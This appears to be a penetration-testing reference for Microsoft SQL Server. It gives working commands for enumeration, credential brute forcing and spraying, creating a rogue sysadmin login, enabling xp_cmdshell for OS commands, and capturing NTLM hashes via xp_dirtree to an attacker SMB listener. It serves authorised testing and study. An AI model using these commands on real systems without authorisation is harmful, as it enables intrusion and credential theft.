MSSQL (Microsoft SQL) Pentesting
MSSQL is a relational database management system. The default instance listens on TCP port 1433; named instances may use other ports, which the SQL Browser service advertises on UDP 1434.
- https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server
- https://learn.microsoft.com/en-us/sql/database-engine/configure-windows/xp-cmdshell-server-configuration-option?view=sql-server-ver16
Enumeration
nmap --script ms-sql-info -p 1433 <target-ip>
nmap --script ms-sql-config -p 1433 <target-ip>
# ms-sql-xp-cmdshell needs valid credentials (mssql.username / mssql.password script args)
nmap --script ms-sql-empty-password,ms-sql-xp-cmdshell -p 1433 <target-ip>
# Quote the glob so the shell does not expand it
nmap --script "ms-sql-*" -p 1433 <target-ip>
# MSDAT: https://github.com/quentinhardy/msdat
# all: Enumerate with all modules
python3 msdat.py all -s example.com
# -D, -U, -P: Use Windows authentication
python3 msdat.py all -s example.com -D domain -U username -P password
# xpdirectory: List directories in system
python3 msdat.py xpdirectory -s manager.htb -D manager -U operator -P operator -d master --list-files 'C:\'
# bulkopen: Read/download files
python3 msdat.py bulkopen -s example.com -D domain -U username -P password -d database --read-file 'C:\Users\Administrator\Desktop\example.txt'
# Metasploit
msfconsole
msf> use auxiliary/admin/mssql/mssql_enum
msf> use auxiliary/admin/mssql/mssql_enum_domain_accounts
msf> use auxiliary/admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump
Brute Force Credentials
netexec mssql <target-ip> -u username -p passwords.txt
hydra -L usernames.txt -p password <target-ip> mssql
hydra -l username -P passwords.txt <target-ip> mssql
Password Spraying Attack
Once one user's password is known, try that single password against every username we have enumerated; accounts often share passwords, and one attempt per user keeps us below lockout thresholds.
Connect
# impacket (first form: SQL Server login; second form: Windows/domain authentication)
impacket-mssqlclient -port 1433 DOMAIN/username:password@<target-ip>
impacket-mssqlclient -port 1433 DOMAIN/username:password@<target-ip> -windows-auth
# sqsh
sqsh -S <target-ip> -U username -P password
sqsh -S <target-ip> -U username -P password -D database
Commands
# Get the version of MSSQL
> SELECT @@version
# Get current username (the database user; SYSTEM_USER returns the server login)
> SELECT user_name()
# Get users of the current database (server logins live in sys.server_principals)
> SELECT * FROM sys.database_principals
# Get databases
> SELECT * FROM master.dbo.sysdatabases
# Switch to the database
> USE <database>
# List tables
> SELECT * FROM information_schema.tables
# Get table content
> SELECT * FROM <database_name>.dbo.<table_name>
# Check whether the current user has been granted permission to run xp_cmdshell
# (members of sysadmin can run it without an explicit grant, so no rows is normal for them)
> USE master
> EXEC sp_helprotect 'xp_cmdshell'
# Get linked servers
> EXEC sp_linkedservers
> SELECT * FROM sys.servers
# Create a new login with sysadmin privilege (requires sysadmin; sp_addsrvrolemember is deprecated but still works).
# A password this weak is rejected if the Windows password policy is enforced; use a complex one or add CHECK_POLICY = OFF.
> CREATE LOGIN tester WITH PASSWORD = 'password'
> EXEC sp_addsrvrolemember 'tester', 'sysadmin'
# List directories
> xp_dirtree '.\'
> xp_dirtree 'C:\inetpub\'
> xp_dirtree 'C:\inetpub\wwwroot\'
> xp_dirtree 'C:\Users\'
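The checks above as one T-SQL script. This is an added example, not part of the original notes; LINKED_SERVER is a placeholder for a name returned by the linked-server query, and the last statement only works where rpc out is enabled for that server.

```sql
-- Added example (not from the original notes): the privilege, configuration and
-- linked-server checks of this section in one pass. LINKED_SERVER is a placeholder.

-- Server login, database user, and whether the login is sysadmin
-- (1 = member, 0 = not a member, NULL = role name not valid)
SELECT SYSTEM_USER AS login_name,
       USER_NAME() AS db_user,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;

-- Is xp_cmdshell enabled? value is the configured setting, value_in_use the
-- running one; they differ until RECONFIGURE is run.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- Explicit grants on xp_cmdshell. Members of sysadmin need none, so the
-- "no matching rows" message is normal when is_sysadmin = 1 above.
EXEC master.dbo.sp_helprotect 'xp_cmdshell';

-- Server logins (SQL logins, Windows logins, Windows groups), skipping the
-- certificate-based ##MS_...## system logins
SELECT name, type_desc, is_disabled, create_date
FROM sys.server_principals
WHERE type IN ('S', 'U', 'G')
  AND name NOT LIKE '##%'
ORDER BY name;

-- Linked servers and the remote login each local login maps to.
-- uses_self_credential = 1: our own credentials are forwarded;
-- a fixed remote_name is often a more privileged account on the other side.
SELECT s.name AS linked_server,
       s.product,
       s.data_source,
       s.is_rpc_out_enabled,
       l.local_principal_id,
       l.uses_self_credential,
       l.remote_name
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS l ON l.server_id = s.server_id
WHERE s.is_linked = 1;

-- Run a query on a linked server (needs is_rpc_out_enabled = 1 above) to see
-- which server we land on and which login and role we hold there
EXEC ('SELECT @@SERVERNAME, SYSTEM_USER, IS_SRVROLEMEMBER(''sysadmin'')') AT [LINKED_SERVER];
```

The last query goes one step past the enumeration commands above: a linked server whose mapping uses a fixed, more privileged remote login is a path to sysadmin on the remote host even when our own login has nothing there.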
Spawn a Windows Command Shell and Run Commands using Impacket
If we connected to MSSQL with impacket-mssqlclient, we can run Windows shell commands through xp_cmdshell. It is disabled by default; enabling it changes a server-wide setting and requires sysadmin (strictly, the ALTER SETTINGS permission). The client's built-in enable_xp_cmdshell command runs the sp_configure/RECONFIGURE sequence for us.
Enable/Disable a Windows Shell
> enable_xp_cmdshell
> disable_xp_cmdshell
# or, in plain T-SQL (this is what the shortcut above runs)
# Enable advanced options, which xp_cmdshell is hidden behind
> EXEC sp_configure 'show advanced options', 1;
# Apply the new configured value
> RECONFIGURE;
# Enable the command shell
> EXEC sp_configure 'xp_cmdshell', 1;
# Apply the new configured value
> RECONFIGURE;
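The enable sequence above leaves xp_cmdshell on for everyone until someone turns it off. The following T-SQL batch is an added example (not from the original notes): it enables xp_cmdshell only when it is off, runs a command with the output kept queryable, and restores the previous setting. It must run as one batch (sqsh: finish with `go`); impacket-mssqlclient sends each input line as its own batch, so the variables would not survive there.

```sql
-- Added example (not from the original notes): enable xp_cmdshell only if it is
-- off, run a command, keep the output queryable, then restore the old setting.
-- Run as ONE batch (sqsh: end with "go"); in impacket-mssqlclient every line is
-- a separate batch and the variables below would be lost between lines.
IF IS_SRVROLEMEMBER('sysadmin') <> 1
BEGIN
    RAISERROR('current login is not sysadmin; reconfiguring xp_cmdshell needs ALTER SETTINGS', 16, 1);
    RETURN;
END;

-- Remember the running values so they can be put back afterwards
DECLARE @was_advanced int, @was_cmdshell int;
SELECT @was_advanced = CAST(value_in_use AS int)
FROM sys.configurations WHERE name = 'show advanced options';
SELECT @was_cmdshell = CAST(value_in_use AS int)
FROM sys.configurations WHERE name = 'xp_cmdshell';

IF @was_cmdshell = 0
BEGIN
    EXEC sp_configure 'show advanced options', 1;
    RECONFIGURE;
    EXEC sp_configure 'xp_cmdshell', 1;
    RECONFIGURE;
END;

-- xp_cmdshell returns its output as a rowset, one row per line, plus a trailing
-- NULL row. Capture it in a temp table so it can be filtered with SQL.
CREATE TABLE #out (line nvarchar(4000));
INSERT INTO #out EXEC master.dbo.xp_cmdshell 'whoami /all';

-- Full output
SELECT line FROM #out WHERE line IS NOT NULL;
-- Only the privilege lines of the account the command ran as; which of them
-- are enabled decides the next step on the host
SELECT line FROM #out WHERE line LIKE 'Se%Privilege%';
DROP TABLE #out;

-- Restore the previous configuration (advanced options only if we changed them)
IF @was_cmdshell = 0
BEGIN
    EXEC sp_configure 'xp_cmdshell', 0;
    RECONFIGURE;
    EXEC sp_configure 'show advanced options', @was_advanced;
    RECONFIGURE;
END;
```

Capturing the rowset matters for long output: dir /s or whoami /all over a slow TDS link is far easier to search with a WHERE clause than to scroll through.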
Commands
Commands run as the SQL Server service account (or as the xp_cmdshell proxy account for callers who are not sysadmin), each call in a fresh cmd.exe, so state such as the working directory does not carry over between calls. impacket-mssqlclient accepts the shorthand below; in plain T-SQL the form is EXEC xp_cmdshell 'whoami'.
# Get current user
> xp_cmdshell whoami
# Show files and directories
> xp_cmdshell dir
> xp_cmdshell dir \Users
# Show hidden files
> xp_cmdshell dir /a
# Get current directory (of the fresh cmd.exe; a "cd somewhere" in one call does not persist to the next)
> xp_cmdshell cd
# Get contents of file
> xp_cmdshell more \Users\Administrator\example.txt
> xp_cmdshell type \Users\Administrator\example.txt
Privilege Escalation
Get NTLM Hash
When SQL Server is made to open a UNC path (mssql_ntlm_stealer does this through xp_dirtree), the SQL Server service account authenticates to that SMB host with NTLM. Pointing it at a host we control captures the service account's Net-NTLMv2 challenge/response. This is not the NT hash and cannot be used for pass-the-hash, but it can be cracked offline (hashcat mode 5600).
1. Start an SMB listener
Start Responder on the interface facing the target. It binds TCP 445, so do not run impacket-smbserver on the same host at the same time; use one or the other.
# In terminal 1
sudo responder -I <interface>
# Alternative to Responder (not at the same time, both need port 445)
sudo impacket-smbserver share ./ -smb2support
2. Execute with Metasploit
In a second terminal, select the following module. SMBPROXY must be our own IP on that interface (Responder prints it when it starts); the target connects back to it.
msfconsole
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer
msf> set rhosts <target_ip>
msf> set username <username>
msf> set password <password>
# If we use Windows credentials, set as below:
msf> set use_windows_authent true
msf> set smbproxy <attacker_ip>
msf> run
When the module runs, the captured hash appears in the terminal where Responder (or impacket-smbserver) is listening.
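The same coercion done by hand from an MSSQL session, as an added example that is not part of the original notes. 10.10.14.5 is a placeholder for the attacker IP the SMB listener is bound to.

```sql
-- Added example (not from the original notes): the manual equivalent of what
-- mssql_ntlm_stealer does. 10.10.14.5 is a placeholder for the listener IP.

-- Whose hash will we get? xp_dirtree runs as the SQL Server service account.
-- If that is a virtual account (NT Service\MSSQLSERVER) or LocalSystem, the
-- outbound SMB authentication uses the machine account, whose random password
-- is not crackable; a domain user service account is the interesting case.
-- (sys.dm_server_services needs VIEW SERVER STATE.)
SELECT servicename, service_account FROM sys.dm_server_services;

-- Force an SMB connection to our listener. Arguments: path, depth (1 = top
-- level only), include files (1). Only the authentication matters; the listing
-- itself is noise. On default installs the public role can execute xp_dirtree,
-- so sysadmin is not needed for this step.
EXEC master.dbo.xp_dirtree '\\10.10.14.5\share', 1, 1;

-- Another extended procedure that also opens the UNC path
EXEC master.dbo.xp_fileexist '\\10.10.14.5\share\x.txt';
```

Run the service-account query first: if the answer is a virtual account or LocalSystem, the captured hash belongs to the computer account and the time is better spent on xp_cmdshell than on cracking.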